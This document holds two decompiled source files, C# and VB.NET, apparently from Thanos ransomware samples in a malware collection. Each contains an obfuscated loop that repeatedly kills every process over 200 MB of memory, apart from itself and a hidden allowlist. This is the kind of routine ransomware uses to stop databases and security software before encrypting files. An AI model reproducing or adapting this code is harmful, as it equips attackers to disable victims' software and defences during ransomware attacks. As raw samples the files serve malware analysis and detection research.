File: HEUR-Trojan-Ransom.MSIL.Thanos.gen-66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2/frgoWklvEOSV/IUmAujruwdxT.cs
using System;
using System.Diagnostics;
using System.Threading;
using SmartAssembly.Delegates;
using SmartAssembly.HouseOfCards;

namespace frgoWklvEOSV;

public static class IUmAujruwdxT
{
	[NonSerialized]
	internal static GetString _001F;

	public static void NcgkgbiyeApEB()
	{
		while (true)
		{
			Process[] processes = Process.GetProcesses();
			foreach (Process process in processes)
			{
				try
				{
					if (process.PrivateMemorySize64 > 209715200 && process.ProcessName != Process.GetCurrentProcess().ProcessName && !process.ProcessName.Contains(_001F(107399014)) && !process.ProcessName.Contains(_001F(107399037)) && !process.ProcessName.Contains(_001F(107399028)) && !process.ProcessName.Contains(_001F(107398987)) && !process.ProcessName.Contains(_001F(107399006)) && !process.ProcessName.Contains(_001F(107398993)) && !process.ProcessName.Contains(_001F(107398948)) && !process.ProcessName.Contains(_001F(107398967)) && !process.ProcessName.Contains(_001F(107398922)) && !process.ProcessName.Contains(_001F(107398941)) && !process.ProcessName.Contains(_001F(107398888)))
					{
						process.Kill();
					}
				}
				catch
				{
				}
			}
			try
			{
				Thread.Sleep(2500);
			}
			catch
			{
			}
		}
	}

	static IUmAujruwdxT()
	{
		Strings.CreateGetStringDelegate(typeof(IUmAujruwdxT));
	}
}

File: HEUR-Trojan-Ransom/MSIL/T/HEUR-Trojan-Ransom.MSIL.Thanos.gen-d29abe6ed086a5508c54df31010c36cc19fea3bdc5d521ee7c0d7063a51bb131/chaddad/frgoWklvEOSV/IUmAujruwdxT.vb
Imports System
Imports System.Diagnostics
Imports System.Threading
Imports SmartAssembly.Delegates
Imports SmartAssembly.HouseOfCards

Namespace frgoWklvEOSV
	' Token: 0x02000022 RID: 34
	Public Module IUmAujruwdxT
		' Token: 0x060000DC RID: 220 RVA: 0x0000F5A0 File Offset: 0x0000D7A0
		Public Sub NcgkgbiyeApEB()
			While True
				For Each process As Process In Process.GetProcesses()
					Try
						If process.PrivateMemorySize64 > 209715200L AndAlso process.ProcessName <> Process.GetCurrentProcess().ProcessName AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107399014)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107399037)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107399028)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107398987)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107399006)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107398993)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107398948)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107398967)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107398922)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107398941)) AndAlso Not process.ProcessName.Contains(IUmAujruwdxT.getString_0(107398888)) Then
							process.Kill()
						End If
					Catch
					End Try
				Next
				Try
					Thread.Sleep(2500)
				Catch
				End Try
			End While
		End Sub

		' Token: 0x060000DD RID: 221 RVA: 0x00002BCE File Offset: 0x00000DCE
		Shared Sub New()
			Strings.CreateGetStringDelegate(GetType(IUmAujruwdxT))
		End Sub

		' Token: 0x040000BF RID: 191
		<NonSerialized()>
		Friend getString_0 As GetString
	End Module
End Namespace
